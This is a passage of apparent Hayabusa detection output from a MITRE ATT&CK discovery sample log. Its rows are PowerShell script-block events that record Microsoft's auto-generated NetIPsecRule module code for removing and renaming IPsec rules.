$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 
'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and 
(@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if 